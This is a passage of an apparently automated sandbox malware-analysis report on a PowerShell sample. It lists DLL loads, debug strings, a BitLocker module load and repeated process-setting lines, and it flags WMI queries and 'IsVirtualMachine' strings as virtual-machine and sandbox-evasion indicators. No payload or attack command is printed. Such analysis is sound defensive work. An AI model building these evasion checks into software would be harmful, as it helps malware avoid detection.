Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.14103932163.000001FBF83C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.ps18 source: powershell.exe, 00000000.00000002.14107344873.000001FBF8839000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.14103932163.000001FBF83C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF8792000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 00000000.00000002.14105281247.000001FBF8792000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.14108380547.000001FBF8BF1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Rn.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF8792000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.14101066352.000001FBF6408000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000000.00000002.14101066352.000001FBF6408000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpdblib.pdbC source: powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tion.pdbl source: powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF87C9000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0B3D2A5 pushad ; iretd 0_2_00007FFCA0B3D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0C500BD pushad ; iretd 0_2_00007FFCA0C500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0C571FD push ebx; ret 0_2_00007FFCA0C5723A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0C52315 pushad ; iretd 0_2_00007FFCA0C5232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0C512AD push E85D4B07h; ret 0_2_00007FFCA0C512D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0C556B7 push esp; retf 0_2_00007FFCA0C556B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0F079AB push edx; ret 0_2_00007FFCA0F079CB

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9951Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.14076096345.000001FB81EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineh
Source: powershell.exe, 00000000.00000002.14095960690.000001FB9028F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.14101066352.000001FBF6408000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80BCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB81EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.14101066352.000001FBF6408000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.14076096345.000001FB81EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachinex
Source: powershell.exe, 00000000.00000002.14105281247.000001FBF8792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:\4
Source: powershell.exe, 00000000.00000002.14076096345.000001FB81EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.14076096345.000001FB81EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
